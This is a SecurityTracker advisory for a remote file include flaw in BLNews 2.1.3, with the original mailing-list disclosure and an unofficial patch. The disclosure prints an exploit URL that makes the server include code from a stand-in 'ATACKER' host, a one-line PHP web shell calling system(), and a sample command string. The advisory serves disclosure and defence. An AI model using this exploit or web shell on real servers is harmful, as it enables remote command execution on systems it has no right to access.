SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |    Help    |   

SecurityTracker
Archives


Welcome to SecurityTracker!
 
Click to Sign Up
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com
Sign Up!





Category:  Application (Forum/Board/Portal)  >  BLNews Vendors:  Sperber, Florian
BLNews Include File Bug in 'objects.inc.php4' Lets Remote Users Execute Arbitrary Commands
SecurityTracker Alert ID:  1006838
CVE Reference:  CAN-2003-0394   (Links to External Site)
Updated:  Jan 21 2004
Original Entry Date:  May 24 2003
Impact:  Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Advisory:  DWC Gr0up
Version(s): 2.1.3
Description:  An include file vulnerability was reported in BLNews. A remote user can execute arbitrary PHP code, including operating system commands, on the target server.

DWC Gr0up reported that the 'admin/objects.inc.php4' script references the $Server[path] variable but does not define the variable. A remote user can supply a value for that variable that points to the remote user's server, causing files on the remote user's server to be included and executed by the target server.

A demonstration exploit URL is provided that will execute the files http://ATACKER/admin/tools.inc.php4 and http://ATACKER/admin/cmd.php4:

admin/objects.inc.php4?Server[path]=http://ATACKER&Server[language_file]=cmd.php4
Impact:  A remote user can cause arbitrary PHP commands, including the '<? system($cmd) ?>' command to be executed by the target server with the privileges of the target web daemon.
Solution:  No vendor solution was available at the time of this entry. The author of the report has provided some unofficial patch instructions:

Before the line 'if ($itheme!="blubb")', you should write the following line:

include("server.inc.php4");
Vendor URL:  www.blnews.de/ (Links to External Site)
Cause:  Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
Reported By:  Over_G <overg@mail.ru>
Message History:   None.

 Source Message Contents
Date:  Sat, 24 May 2003 15:27:54 +0400
From:  Over_G <overg@mail.ru>
Subject:  PHP source code injection in BLNews

 

Product: BLNews
Version: 2.1.3
OffSite: http://www.blnews.de/
Problem: PHP source code injection
--------------------------------------------

Vulnerability:

------------admin/objects.inc.php4------------

if ($itheme!="blubb")
{ include("$Server[path]/admin/tools.inc.php4"); }
include("$Server[path]/admin/$Server[language_file]");

-----------------------------------------------------

The developers forgot write include("server.inc.php4") :)

Exploit: admin/objects.inc.php4?Server[path]=http://ATACKER&Server[language_file]=cmd.php4
with
http://ATACKER/admin/tools.inc.php4
http://ATACKER/admin/cmd.php4

with
<? system($cmd) ?>

Use: objects.inc.php4?Server[path]=http://ATACKER&cmd=id;uname -a;pwd;

Patch.
write before line        if ($itheme!="blubb")
include("server.inc.php4");



Contacts: www.overg.com www.dwcgr0up.com
irc.irochka.net #DWC
overg@mail.ru


regards, Over G[DWC Gr0up]


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us   |    Help

Copyright 2004, SecurityGlobal.net LLC